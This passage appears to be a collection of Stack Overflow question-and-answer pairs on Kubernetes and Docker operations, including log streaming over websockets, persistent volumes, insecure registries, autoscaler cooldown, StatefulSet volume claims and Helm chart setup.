w.Header().Set("Access-Control-Allow-Origin", "*")
conn, err := upgrader.Upgrade(w, r, nil)
if err != nil {
if _, ok := err.(websocket.HandshakeError); !ok {
log.Println(err)
}
return
}
defer conn.Close()
logsClient, err := InitKubeLogsClient(config.InCluster)
if err != nil {
log.Fatalln(err)
}
stream, err := logsClient.GetLogs(config.Namespace, config.PodName, config.ContainerName)
if err != nil {
log.Fatalln(err)
}
defer stream.Close()
reader := bufio.NewReader(stream)
for {
line, err := reader.ReadString('\n')
if err != nil {
log.Fatalln(err)
}
conn.WriteMessage(websocket.TextMessage, []byte(line))
}
}
</code></pre>
<p>I am using <a href="https://github.com/gorilla/websocket" rel="nofollow noreferrer">https://github.com/gorilla/websocket</a> as the websocket lib. And on the browser</p>
<p>Is this the best way to do what I want? Is there some better way to just expose the logs api from k8s to websocket?</p>
| <p>Put my final code here, thanks for the tips from @Peter:</p>
<pre><code>func serveWs(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Access-Control-Allow-Origin", "*")
conn, err := upgrader.Upgrade(w, r, nil)
if err != nil {
if _, ok := err.(websocket.HandshakeError); !ok {
log.Println(err)
}
return
}
log.Println("create new connection")
defer func() {
conn.Close()
log.Println("connection close")
}()
logsClient, err := InitKubeLogsClient(config.InCluster)
if err != nil {
log.Println(err)
return
}
stream, err := logsClient.GetLogs(config.Namespace, config.PodName, config.ContainerName)
if err != nil {
log.Println(err)
return
}
defer stream.Close()
reader := bufio.NewReaderSize(stream, 16)
lastLine := ""
for {
data, isPrefix, err := reader.ReadLine()
if err != nil {
log.Println(err)
return
}
lines := strings.Split(string(data), "\r")
length := len(lines)
if len(lastLine) > 0 {
lines[0] = lastLine + lines[0]
lastLine = ""
}
if isPrefix {
lastLine = lines[length-1]
lines = lines[:(length - 1)]
}
for _, line := range lines {
if err := conn.WriteMessage(websocket.TextMessage, []byte(line)); err != nil {
log.Println(err)
return
}
}
}
}
</code></pre>
|
<p>We have a setup, where Metricbeat is deployed as a DaemonSet on a Kubernetes cluster (specifically -- AWS EKS).</p>
<p>All seems to be functioning properly, but the <strong>kubelet</strong> connection.</p>
<p>To clarify, the following module:</p>
<pre><code>- module: kubernetes
enabled: true
metricsets:
- state_pod
period: 10s
hosts: ["kube-state-metrics.system:8080"]
</code></pre>
<p>works properly (the events flow into logstash/elastic).</p>
<p>This module configuration, however, doesn't work in any variants of hosts value (<code>localhost</code>/<code>kubernetes.default</code>/whatever):</p>
<pre><code>- module: kubernetes
period: 10s
metricsets:
- pod
hosts: ["localhost:10255"]
enabled: true
add_metadata: true
in_cluster: true
</code></pre>
<blockquote>
<p>NOTE: using cluster IP instead of localhost (so that it goes to
control plane) also works (although doesn't retrieve the needed
information, of course).</p>
<p>The configuration above was taken directly from the Metricbeat
documentation and immediately struck me as odd -- how does localhost
get translated (from within Metricbeat docker) to corresponding
kubelet?</p>
</blockquote>
<p>The error is, as one would expect, in light of the above:</p>
<pre><code>error making http request: Get http://localhost:10255/stats/summary:
dial tcp [::1]:10255: connect: cannot assign requested address
</code></pre>
<p>which indicates some sort of connectivity issue.</p>
<p>However, when SSH-ing to any node Metricbeat is deployed on, <code>http://localhost:10255/stats/summary</code> provides the correct output:</p>
<pre><code>{
"node": {
"nodeName": "...",
"systemContainers": [
{
"name": "pods",
"startTime": "2018-12-06T11:22:07Z",
"cpu": {
"time": "2018-12-23T06:54:06Z",
...
},
"memory": {
"time": "2018-12-23T06:54:06Z",
"availableBytes": 17882275840,
....
</code></pre>
<p>I must be missing something very obvious. Any suggestion would do.</p>
<p>NOTE: I cross-posted (and got no response for a couple of days) the same on <a href="https://discuss.elastic.co/t/metricbeat-kubernetes-module-cant-connect-to-kubelet/161939" rel="nofollow noreferrer">Elasticsearch Forums</a></p>
| <p>Inject the Pod's Node's IP via the <code>valueFrom</code> provider in the <code>env:</code> list:</p>
<pre><code>env:
- name: HOST_IP
valueFrom:
fieldRef: status.hostIP
</code></pre>
<p>and then update the metricbeat config file to use the host's IP:</p>
<pre><code>hosts: ["${HOST_IP}:10255"]
</code></pre>
<p>which metricbeat will resolve via its <a href="https://www.elastic.co/guide/en/beats/libbeat/6.5/config-file-format-env-vars.html#config-file-format-env-vars" rel="noreferrer">environment variable config injection</a></p>
|
<p>I am getting error of </p>
<blockquote>
<p>1 node(s) didn't find available persistent volumes to bind.</p>
</blockquote>
<p>upon creating my pod to attach to Persistent Storage.</p>
<p>I have setup below. </p>
<p><code>PersistentVolume</code> and <code>StorageClass</code> created and attached successfully.
Once I create PersistentVolumeClaim, it waits in "pending" state, which is expected (I believe) because
it waits a pod to connect due to "<code>WaitForFirstConsumer</code>" setting of <code>StorageClass</code>.</p>
<pre><code>apiVersion: v1
kind: PersistentVolume
metadata:
name: example-local-pv
spec:
capacity:
storage: 2Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Retain
storageClassName: local-storage
local:
path: /home/aozdemir/k8s
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- my-node
---
kind: StorageClass
apiVersion: storage.k8s.io/v1
metadata:
name: local-storage
provisioner: kubernetes.io/no-provisioner
volumeBindingMode: WaitForFirstConsumer
---
kind: PersistentVolumeClaim
apiVersion: v1
metadata:
name: example-local-claim
spec:
accessModes:
- ReadWriteOnce
storageClassName: local-storage
resources:
requests:
storage: 2Gi
---
kind: Pod
apiVersion: v1
metadata:
name: task-pv-pod
spec:
volumes:
- name: task-pv-storage
persistentVolumeClaim:
claimName: example-local-claim
containers:
- name: task-pv-container
image: nginx
ports:
- containerPort: 80
name: "http-server"
volumeMounts:
- mountPath: "/usr/share/nginx/html"
name: task-pv-storage
</code></pre>
<p>My problem is that, after I create the Pod, it gives following warning:</p>
<blockquote>
<p>0/1 nodes are available: 1 node(s) didn't find available persistent
volumes to bind.</p>
</blockquote>
<p>Here is screenshot:</p>
<p><a href="https://i.stack.imgur.com/fuehs.png" rel="noreferrer"><img src="https://i.stack.imgur.com/fuehs.png" alt="enter image description here"></a></p>
<p>Am I missing something here?</p>
| <p>It was my bad.
Due to following blog post: <a href="https://kubernetes.io/blog/2018/04/13/local-persistent-volumes-beta/" rel="noreferrer">https://kubernetes.io/blog/2018/04/13/local-persistent-volumes-beta/</a></p>
<blockquote>
<p>Note that there’s a new <strong>nodeAffinity</strong> field in the PersistentVolume
object: this is how the Kubernetes scheduler understands that this
PersistentVolume is tied to a specific node. nodeAffinity is a
<strong>required field for local PersistentVolumes</strong>.</p>
</blockquote>
<p>and my value was incorrect. I changed it to my node name, and re-deployed, it worked.</p>
|
<p>I am trying to use Jenkins to build and push docker images to private registry. However, while trying <code>docker login</code> command, I am getting this error:</p>
<pre><code>http: server gave HTTP response to HTTPS client
</code></pre>
<p>I know that this might be happening because the private registry is not added as an insecure registry. But, how I can resolve this in CI pipeline?</p>
<p>Jenkins is set up on a Kubernetes cluster and I am trying to automate the deployment of an application on the cluster.</p>
| <p>This has nothing to do with the Jenkins CI pipeline or Kubernetes. Jenkins will not be able to push your images until configure follow either of the below steps</p>
<p>You have two options here</p>
<p>1) Configure your docker client to use the secure registry over HTTPS. This will include setting up self signed certificates or getting certificates from your local certificate authority.</p>
<p>2) Second solution is to use your registry over an unencrypted HTTP connection.
So if you are running docker on kubernetes. You will have to configure the <code>daemon.json</code> file in <code>/etc/docker/daemon.json</code>. </p>
<p>PS: This file might not exist. You will have to create it.</p>
<p>Then add in the below content. Make sure you change the url to match your docker registry</p>
<pre><code>{
"insecure-registries" : ["myregistrydomain.com:5000"]
}
</code></pre>
<p>Then restart docker using <code>systemctl restart docker</code> or <code>etc/init.d/docker restart</code> depending on the version of linux distro installed on your cluster</p>
<p>Let me know if you have any questions</p>
|
<p>I want to create Kubernetes cluster with Terraform,</p>
<p>Regarding the doc page here: <a href="https://www.terraform.io/docs/providers/alicloud/r/cs_managed_kubernetes.html" rel="nofollow noreferrer">https://www.terraform.io/docs/providers/alicloud/r/cs_managed_kubernetes.html</a></p>
<pre><code>variable "name" {
default = "my-first-k8s"
}
data "alicloud_zones" main {
available_resource_creation = "VSwitch"
}
data "alicloud_instance_types" "default" {
availability_zone = "${data.alicloud_zones.main.zones.0.id}"
cpu_core_count = 1
memory_size = 2
}
</code></pre>
<p>Where do I insert vswitch id? and how to set the region id?</p>
| <p><strong>To set region:</strong></p>
<p>While configuring Alicloud provider in Terraform itself you can set the region:</p>
<pre><code>provider "alicloud" {
access_key = "${var.access_key}"
secret_key = "${var.secret_key}"
region = "${var.region}"
}
</code></pre>
<p>For instance, let me consider <strong>Beijing</strong> as the region:</p>
<pre><code>provider "alicloud" {
access_key = "accesskey"
secret_key = "secretkey"
region = "cn-beijing"
}
</code></pre>
<p><strong>To set vswitch IDs:</strong></p>
<p>while defining the <code>resource</code> section we can insert the desired vswitches</p>
<pre><code>resource "alicloud_instance"{
# ...
instance_name = "in-the-vpc"
vswitch_id = "${data.alicloud_vswitches.vswitches_ds.vswitches.0.id}"
# ...
}
</code></pre>
<p>For instance, let me consider <strong>vsw-25naue4gz</strong> as the vswitch id:</p>
<pre><code>resource "alicloud_instance"{
# ...
vswitch_id = "vsw-25naue4gz"
# ...
}
</code></pre>
|
<p>Databases are designed to consume all memory, CPU and IO available to them.
Is there are good/bad reasons Docker should not be used for databases in production?</p>
<p>May be this question applies to other tools like MOMs Apache Kafka, Apache ActiveMQ etc.</p>
| <p>Docker is not a full-scale virtual machine (at least when run on Linux), this is just another process, running on the same kernel, as host machine. Moreover, all <code>docker</code> container processes can be seen in a host machine with <code>ps aux</code>. </p>
<p>The only additional load <code>Docker</code> gives is loading another OS on top of your kernel, but actually most containers are deployed with extremely lightweight stuff like <code>alpine</code> Linux, so I dont think it really has to be taken into consideration.</p>
<p>From another point, having Database (or any other high load service) in a containers gives you following advantages:</p>
<ul>
<li>Scaling (containers can easily be spread among nodes with container orchestration tools like <code>k8s</code>)</li>
<li>Easy deploy (all dependencies are inside)</li>
<li>Easy upgrade (just replace the container)</li>
<li>Easy testing (no need for db-cleaning procedures in advance of running tests)
and others</li>
</ul>
<p>So deploying containerized services today is a right practice.</p>
|
<p>Does anyone know the correct procedure to bring down a kubernetes cluster gracefully?
I have K8s 1.12 running on bare metal (built with kubeadm on Ubuntu 16.04) in a lab. I want to bring down the cluster gracefully before I shut down the servers. Strangely this is not documented - so maybe that is handled when the system services are stopped; but I want to check.
Thanks</p>
| <p>The tear down section of the <a href="https://kubernetes.io/docs/setup/independent/create-cluster-kubeadm/#tear-down" rel="nofollow noreferrer">official documentation</a> says:</p>
<p>To undo what kubeadm did, you should first drain the node and make sure that the node is empty before shutting it down.</p>
<p>Talking to the master with the appropriate credentials, run:</p>
<pre><code>kubectl drain <node name> --delete-local-data --force --ignore-daemonsets
kubectl delete node <node name>
</code></pre>
<p>Then, on the node being removed, reset all kubeadm installed state:</p>
<pre><code>kubeadm reset
</code></pre>
|
<p>I am using Kubernetes HPA to scale up my cluster. I have set up target CPU utilization is 50% . It is scaling up properly. But, when load decreases and it scales down so fast. I want to set a cooling period. As an example, even the CPU util is below 50% , it should wait for 60 sec before terminating a node.</p>
<p>I have checked this article, but it is not saying that I can change the default value in HPA, <a href="https://kubernetes.io/docs/concepts/workloads/pods/pod/index.html#termination-of-pods" rel="nofollow noreferrer">https://kubernetes.io/docs/concepts/workloads/pods/pod/index.html#termination-of-pods</a></p>
<p>Kops version :- 1.9.1</p>
| <p>This is configured at the HPA level: <a href="https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-cooldown-delay" rel="nofollow noreferrer">https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-cooldown-delay</a></p>
<blockquote>
<p>--horizontal-pod-autoscaler-downscale-delay: The value for this option is a duration that specifies how long the autoscaler has to wait before another downscale operation can be performed after the current one has completed. The default value is 5 minutes (5m0s).</p>
</blockquote>
|
<p>I am running a web service that can be accessed from my company's domain name.
I have setup automatic SSL certificates with Lets Encrypt as seen below.</p>
<p><code>apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: basic-ingress
annotations:
certmanager.k8s.io/issuer: letsencrypt
spec:
tls:
- hosts:
- my.domain.net
secretName: my-domain-net-tls
rules:
- host: my.domain.net
http:
paths:
- backend:
serviceName: frontend-service
servicePort: 80-to-8080-tcp
</code></p>
<p>I want to offer clients the option of serving the frontend from their own domains.
What is the best way to go about this with certificates?
I understand that I can setup the load balancer to use multiple secrets as shown here: <a href="https://cloud.google.com/kubernetes-engine/docs/how-to/ingress-multi-ssl" rel="nofollow noreferrer">https://cloud.google.com/kubernetes-engine/docs/how-to/ingress-multi-ssl</a>,
but I will need to be serving from more than the stated max of 10 domains.</p>
<p>Is there a more efficient way to go about this? What's the industry standard for serving one frontend service from multiple domains?</p>
<p>Many thanks!</p>
| <p>The standard method to support more than one domain name and / or subdomain names is to use one SSL Certificate and implement SAN (Subject Alternative Names). The extra domain names are stored together in the SAN. All SSL certificates support SAN, but not all certificate authorities will issue multi-domain certificates. Let's Encrypt does support SAN so their certificates will meet your goal.</p>
<p><a href="https://www.ssl.com/faqs/what-is-a-san-certificate/" rel="nofollow noreferrer">What is a SAN Certificate?</a></p>
|
<p>I would like to know if it is possible for multiple pods in the same Kubernetes cluster to access a database which is configured using persistent volumes on a Google cloud persistent disk. </p>
<p>Currently I am building a microservices achitecture web app which has 3 node apis in different pods all accessing the same database. So how do I achieve this with kubernetes.</p>
<p>Kindly let me know if my architecture is right as well</p>
| <p>You can certainly connect multiple node-based app pods to the same database. It is sometimes said that microservices shouldn't share a database but this depends on what your apps are doing, the project history and the extent to which you want the parts to be worked on separately. </p>
<p>There are questions you have to answer about running databases at scale, such as your future load and whether you want to use relational databases if you're going to try to span availability zones. And there are
some specific to kubernetes, especially around how you associate DB Pods to data. See <a href="https://stackoverflow.com/a/53980021/9705485">https://stackoverflow.com/a/53980021/9705485</a>. Another popular option is to use a managed DB service from a cloud provider. If you do run the DB in k8s then I'd suggest looking for a helm chart or looking at an operator, such as the kubeDB operator, to avoid crafting the kubernetes descriptors yourself and to get more guidance on running the DB and setting it up. </p>
<p>If it's a new project and you've not used k8s before then you'll also have to decide where to host your code, your docker images and your deployment descriptors and how to setup your CI pipelines. If you've not got answers to these questions already then I'd suggest looking at Jenkins-X as it will provide you with out of the box defaults for a whole cluster and CI setup and a template ('build pack') for building node apps and deploying them to staging and prod environments through a pipeline.</p>
|
<p>i want to schedule 10 pods in two specific node(total 15 nodes in our kube cluster).</p>
<p>so in replication-controller file i am mentioning two values in nodeSelector
like below. </p>
<pre><code>nodeSelector:
app: node1
app: node2
</code></pre>
<p>problem is that all the time it's taking only node2.whatever sequence i am mentioning, it's taking last node only.</p>
<p>note: <code>node1</code> and <code>node2</code> are lables of node.</p>
| <p>The better way is in using something like this:</p>
<pre><code> affinity:
nodeAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node1
- node2
</code></pre>
|
<p>I am using a PVC with ReadWriteOnce access mode, which is used by a logstash Deployment which will run a stateful application and use this PVC.Each pod in the deployment will try to bind to the same persistent volume claim. In case of replicas > 1, it will fail (as it supports ReadWriteOnce, only the first one will be able to bind successfully). How do I specify that each pod is to be bound to a separate PV.</p>
<p>I don't want to define 3 separate yamls for each logstash replica / instance</p>
<pre><code>apiVersion: apps/v1
kind: Deployment
metadata:
name: logstash
spec:
replicas: 3
template:
metadata:
labels:
app: logstash
spec:
containers:
image: "logstash-image"
imagePullPolicy: IfNotPresent
name: logstash
volumeMounts:
- mountPath: /data
name: logstash-data
restartPolicy: Always
volumes:
- name: logstash-data
persistentVolumeClaim:
claimName: logstash-vol
</code></pre>
<p>Need a way to do volume mount of different PVs to different pod replicas. </p>
| <p>With Deployments you cannot do this properly. You should use StatefulSet with PVC template to achieve your target. The part of your StatefulSet YAML code snippet could look like this:</p>
<pre><code>...
volumeClaimTemplates:
- metadata:
name: pv-data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 5G
</code></pre>
<p>assuming you have 3 replicas, you will see the pods are created one by one sequentially, and the PVC is requested during the pod creation.</p>
<p>The PVC is named as
<code>volumeClaimTemplate name + pod-name + ordinal number</code> and as result, you will have the list of newly created PVCs:</p>
<pre><code>pv-data-<pod_name>-0
pv-data-<pod_name>-1
pv-data-<pod_name>-N
</code></pre>
<p>StatefulSet makes the names (not only names in fact) of your pods static and increments them depending on replica count, thats why every Pod will match its own PVC and PV respectively</p>
<blockquote>
<p>Note: this is called dynamic provisioning. You should be familiar with
configuring kubernetes control plane components (like
controller-manager) to achieve this, because you will need
configured persistent storage (one of them) providers and understand
the retain policy of your data, but this is completely another
question...</p>
</blockquote>
|
<p>I'm using <strong>Docker Desktop for mac</strong> for <strong>Kubernetes</strong> in local desktop. I'm trying to connect to DB installed on my local machine within a pod but can't figure what should be the host address. How can I relate to the address of my machine within a pod?</p>
<p>Please note that I can't use the ip of my machine since the db port is blocked in my network.</p>
| <p>From docker 18.03 onwards, you can use special DNS name<code>host.docker.internal</code> which resolves to the internal address used by host.</p>
<p>Please look at the official docs <a href="https://docs.docker.com/docker-for-mac/networking/#per-container-ip-addressing-is-not-possible" rel="noreferrer">here</a> for more information on this.</p>
<p>If you're on earlier version than docker 18.03, you need to use the experimental DNS name <code>docker.for.mac.localhost</code> to resolve to the local host.</p>
<p>Hope this helps.</p>
|
<p>I have deployed my app on the limited available Kubernetes cluster on DigitalOcean.
I have a spring boot app with a service exposed on port 31744 for external using nodeport service config. </p>
<p>I created a Loadbalancer using the yaml config per DO link doc: <a href="https://www.digitalocean.com/docs/kubernetes/how-to/add-load-balancer/" rel="nofollow noreferrer">https://www.digitalocean.com/docs/kubernetes/how-to/add-load-balancer/</a> </p>
<p>However, I am not able to hook up to my service. Can you advise on how it can be done so I can access my service from the loadbalancer? </p>
<p>The following is my "kubectl get svc" output for my app service: </p>
<pre><code>NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
my-springboot NodePort 10.245.6.216 <none> 8080:31744/TCP 2d18h
kubernetes ClusterIP 10.245.0.1 <none> 443/TCP 3d20h
sample-load-balancer LoadBalancer 10.245.53.168 58.183.251.550 80:30495/TCP 2m6s
</code></pre>
<p>The following is my loadbalancer.yaml:</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: sample-load-balancer
spec:
type: LoadBalancer
ports:
- protocol: TCP
port: 80
targetPort: 31744
name: http
</code></pre>
<p>My service.yaml:</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: my-springboot
labels:
app: my-springboot
tier: backend
spec:
type: NodePort
ports:
# the port that this service should serve on
- port: 8080
selector:
app: my-springboot
tier: backend
</code></pre>
<p>Thanks</p>
| <p>To expose your service using <code>LoadBalancer</code> instead of <code>NodePort</code> you need to provide <code>type</code> in service as <code>LoadBalancer</code>. So your new service config yaml will be:</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: my-springboot
labels:
app: my-springboot
tier: backend
spec:
type: LoadBalancer
ports:
# the port that this service should serve on
- port: 8080
selector:
app: my-springboot
tier: backend
</code></pre>
<p>Once you apply the above service yaml file, you will get the external IP in <code>kubectl get svc</code> which can be used to access the service from outside the kubernetes cluster.</p>
|
<p>As stated in the title I am experiencing error </p>
<blockquote>
<p>Back-off restarting failed container while creating a service</p>
</blockquote>
<p>I've seen questions on Stack Overflow but I am still not sure how to resolve it.</p>
<p>This is my <strong>deployment yaml file</strong>:</p>
<pre><code>apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: book-api
spec:
replicas: 1
revisionHistoryLimit: 10
template:
metadata:
name: book-api
labels:
app: book-api
spec:
containers:
- name: book-api
image: newmaster/kubecourse-books:v1
ports:
- name: http
containerPort: 3000
</code></pre>
<p>while the <strong>service deployment file</strong> is:</p>
<pre><code>kind: Service
apiVersion: v1
metadata:
name: exampleservice
spec:
selector:
app: myapp
ports:
- protocol: "TCP"
# Port accessible inside cluster
port: 8081
# Port to forward to inside the pod
targetPort: 8080
# Port accessible outside cluster
nodePort: 30000
type: LoadBalancer
</code></pre>
<p>This is my Dockerfile:</p>
<pre><code>FROM node:alpine
# Create app directory
WORKDIR /src
# Install app dependencies
COPY package.json /src/
COPY package-lock.json /src/
RUN npm install
# Bundle app source
ADD . /src
RUN npm run build
EXPOSE 3000
CMD [ "npm", "run serve" ]
</code></pre>
<p>I have no idea how to resolve this issue, I am newbie in the Kubernetes and DevOps world.
Repo is over here: <a href="https://github.com/codemasternode/BookService.Kubecourse.git" rel="nofollow noreferrer">https://github.com/codemasternode/BookService.Kubecourse.git</a></p>
| <p>I tried to run your deployment locally and this is what the log shown:</p>
<pre><code>kubectl log book-api-8d98bf6d5-zbv4q
Usage: npm <command>
where <command> is one of:
access, adduser, audit, bin, bugs, c, cache, ci, cit,
clean-install, clean-install-test, completion, config,
create, ddp, dedupe, deprecate, dist-tag, docs, doctor,
edit, explore, get, help, help-search, hook, i, init,
install, install-ci-test, install-test, it, link, list, ln,
login, logout, ls, outdated, owner, pack, ping, prefix,
profile, prune, publish, rb, rebuild, repo, restart, root,
run, run-script, s, se, search, set, shrinkwrap, star,
stars, start, stop, t, team, test, token, tst, un,
uninstall, unpublish, unstar, up, update, v, version, view,
whoami
npm <command> -h quick help on <command>
npm -l display full usage info
npm help <term> search for help on <term>
npm help npm involved overview
Specify configs in the ini-formatted file:
/root/.npmrc
or on the command line via: npm <command> --key value
Config info can be viewed via: npm help config
[email protected] /usr/local/lib/node_modules/npm
</code></pre>
<p>It seems no command is running by default with the newmaster/kubecourse-books:v1 </p>
<p>I guess if you want to run the default npm command, you could run the following deploy config (note the <code>command</code> value):</p>
<pre><code>apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: book-api
spec:
replicas: 1
revisionHistoryLimit: 10
template:
metadata:
name: book-api
labels:
app: book-api
spec:
containers:
- name: book-api
image: newmaster/kubecourse-books:v1
command: ["npm", "start"]
ports:
- name: http
containerPort: 3000
</code></pre>
|
<p>As a QA in our company I am daily user of kubernetes, and we use kubernetes job to create performance tests pods. One advantage of job, according to the <a href="https://kubernetes.io/docs/concepts/workloads/controllers/jobs-run-to-completion/" rel="nofollow noreferrer">docs</a>, is </p>
<blockquote>
<p>to create one Job object in order to reliably run one Pod to completion</p>
</blockquote>
<p>But in our tests this feature will create infinite pods if previous ones fail, which will occupy resources of our team's shared cluster, and deleting such pods will take a lot of time. see this image:
<a href="https://i.stack.imgur.com/6pjF2.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/6pjF2.png" alt="enter image description here"></a></p>
<p>Currently the job manifest is like this:</p>
<pre><code> {
"apiVersion": "batch/v1",
"kind": "Job",
"metadata": {
"name": "upgradeperf",
"namespace": "ntg6-grpc26-tts"
},
"spec": {
"template": {
"spec": {
"containers": [
{
"name": "upgradeperfjob",
"image":
"mycompany.com:5000/ncs-cd-qa/upgradeperf:0.1.1",
"command": [
"python",
"/jmeterwork/jmeter.py",
"-gu",
"[email protected]:mobility-ncs-tools/tts-cdqa-tool.git",
"-gb",
"upgradeperf",
"-t",
"JMeter/testcases/ttssvc/JMeterTestPlan_ttssvc_cmpsize.jmx",
"-JtestDataFile",
"JMeter/testcases/ttssvc/testData/avaml_opus.csv",
"-JthreadNum",
"3",
"-JthreadLoopCount",
"1500",
"-JresultsFile",
"results_upgradeperf_cavaml_opus_t3_l1500.csv",
"-Jhost",
"mtl-blade32-03.mycompany.com",
"-Jport",
"28416"
]
}
],
"restartPolicy": "Never",
"imagePullSecrets": [
{
"name": "docker-registry-secret"
}
]
}
}
}
}
</code></pre>
<p>In some cases, such as misconfiguring of ip/ports, 'reliably run one Pod to completion' is impossible and recreating pods is waste of time and resource.
So is it possible, and how to limit kubernetes job to create a maxium number(say 3) of pods if always fail?</p>
| <p>Depending on your kubernetes version, you can resolve this problem with these methods:</p>
<ol>
<li><p>set the option: <code>restartPolicy: OnFailure</code>, then the failed container will be restarted in the same Pod, so you will not get lots of failed Pods, instead you will get a Pod with lots of restart.</p></li>
<li><p>From Kubernetes 1.8 on, There is a parameter <code>backoffLimit</code> to control the restart policy of failed job. This parameter defines the retry times of the job before treating the job to be failed, default 6 times. For this parameter to work you must set the parameter <code>restartPolicy: Never</code> .</p></li>
</ol>
|
<p>I'm running a SSE server on a VPS and it works perfectly, no problems at all, but due to scalability reasons I needed to move it to another server.</p>
<p>I moved the server to <strong>Google Cloud Platform/Google Container Engine</strong> and <strong>Kubernetes/Ingress</strong>. But now I've encountered that I can't keep a SSE connection effectively, it's completely unstable and it closes connections by itself.</p>
<p>Is there anything special I have to do to run a <strong>SSE</strong> server over <strong>Kubernetes/Ingress</strong>?</p>
<p>I assume my code/software runs perfect and that is not the issue, due it works perfectly in Kubernetes, VPS, on my machine, everywhere, just not when I add the Ingress configuration, and I'm doing this because I want <strong>HTTPS</strong> over the <strong>Kubernetes</strong> <strong>load-balancer</strong>.</p>
| <p>I'ts not possible to do it, it may work for some clients and not for others, the explanation of this is with how kubernetes behave, <a href="https://i.stack.imgur.com/3Kcx5.jpg" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/3Kcx5.jpg" alt="enter image description here"></a>
let's supposed there are 3 nodes in your app, a node is virtual machine, when a request it's being made, kubernetes has to decide in which of this virtual machines will run, if it's the case of <a href="https://www.w3schools.com/html/html5_serversentevents.asp" rel="nofollow noreferrer">SSE</a> this conection must persists until client close your app, so with this in mind, let's supossed you have a chat app.
So we have two clients, now let's supossed kubernetes always redirect client 1 and 2 to node 1 <a href="https://i.stack.imgur.com/J04a4.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/J04a4.png" alt="enter image description here"></a></p>
<p>when a SSE connection(green line) is stablished, this will persists, now let's supossed client 1 send a message, as I said before we are in the case everything goes through node 1,
<a href="https://i.stack.imgur.com/zCQrR.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/zCQrR.png" alt="enter image description here"></a>
the node will handle this request, your app will look in memory if receiver is connected and if so, it will send the message through SSE conection <a href="https://i.stack.imgur.com/33Baj.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/33Baj.png" alt="enter image description here"></a> in this case everything works perfect, the problem is when the clients are not redirected to the same node
<a href="https://i.stack.imgur.com/wZDcT.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/wZDcT.png" alt="enter image description here"></a></p>
<p>when a client sends a message,<a href="https://i.stack.imgur.com/9ESvU.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/9ESvU.png" alt="enter image description here"></a>
this will go through to node 1 but when checking if client 2 is connected, it won't find the conection because this connection was not saved in this node so the client 2 won't recieve this message. To solve this problem you will need a new structured, you need to have one instance dedicated only for SSE conections, so when a client conects to a sse it will go to a the dedicated instance <a href="https://i.stack.imgur.com/yqGpS.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/yqGpS.png" alt="enter image description here"></a>
and when client 1 sends a message <a href="https://i.stack.imgur.com/R6uxa.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/R6uxa.png" alt="enter image description here"></a>
the nodes will comunicate with this dedicated instance and will send to client 2 the message <a href="https://i.stack.imgur.com/kXcAY.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/kXcAY.png" alt="enter image description here"></a></p>
<p>now to created this dedicate server you should use and external source service if you want, or better you could create your own instance and redirect your sse endpoint to the SSE instance, you can do this with a Load Balancing this acts as a proxy and it will decide to which resource redirect based on the incoming URL <a href="https://cloud.google.com/load-balancing/docs/https/url-map" rel="nofollow noreferrer">more info</a>
Also you need to configure in this dedicate SSE server not to close connection to fast </p>
|
<p>I'm using helm charts to create deploy micro services, by executing helm create it creates basic chart with deployment, services and ingress but I have few other configurations such as horizontal pod autoscaler, pod disruption budget. </p>
<p>what I do currently copy the yaml and change accordingly, but this takes lot of time and I don't see this as a (correct way/best practice) to do it. </p>
<pre><code>helm create <chartname>
</code></pre>
<p>I want to know how you can create helm charts and have your extra configurations as well. </p>
| <p>Bitnami's <a href="https://docs.bitnami.com/kubernetes/how-to/create-your-first-helm-chart/" rel="nofollow noreferrer">guide to creating your first helm chart</a> describes <code>helm create</code> as "the best way to get started" and says that "if you already have definitions for your application, all you need to do is replace the generated YAML files for your own". The approach is also suggested in the <a href="https://docs.helm.sh/using_helm/#creating-your-own-charts" rel="nofollow noreferrer">official helm docs</a> and the <a href="https://docs.helm.sh/developing_charts/#using-helm-to-manage-charts" rel="nofollow noreferrer">chart developer guide</a>. So you are acting on best advice.</p>
<p>It would be cool if there were a wizard you could use to take existing kubernetes yaml files and make a helm chart from them. One tool like this that is currently available is <a href="https://github.com/appscode/chartify" rel="nofollow noreferrer">chartify</a>. It is listed on helm's <a href="https://github.com/helm/helm/blob/master/docs/related.md" rel="nofollow noreferrer">related projects page</a> (and I couldn't see any others that would be relevant).</p>
|
<p>I am writing some unit-tests for a sample Kubernetes CRD and controller created using Kubebuilder. The main code in the controller creates Kubernetes resources (a namespace and a ResourceQuota inside it). In my unit-tests, I want to verify that the controller actually created these. I use a <code>client.Client</code> object created using the default <code>sigs.k8s.io/controller-runtime/pkg/manager</code> object.</p>
<pre><code>mgr, _ := manager.New(cfg, manager.Options{})
cl := mgr.GetClient()
rq := &corev1.ResourceQuota{}
err = cl.Get(ctx, types.NamespacedName{Name: "my-quota", Namespace:
"my-namespace"}, rq)
</code></pre>
<p>I know that the main code works fine because I tested it in a real, live environment. I see that the main code gets called from the unit tests. However, the above code in the unit tests does not work; i.e. the call to Get() does the return the ResourceQuota I expect. I've also tried the List() api but that too does not return anything. There is no error either. Just an empty response.</p>
<p>Do I have to do something special/different for getting the K8S control plane in Kubebuilder to run unit tests?</p>
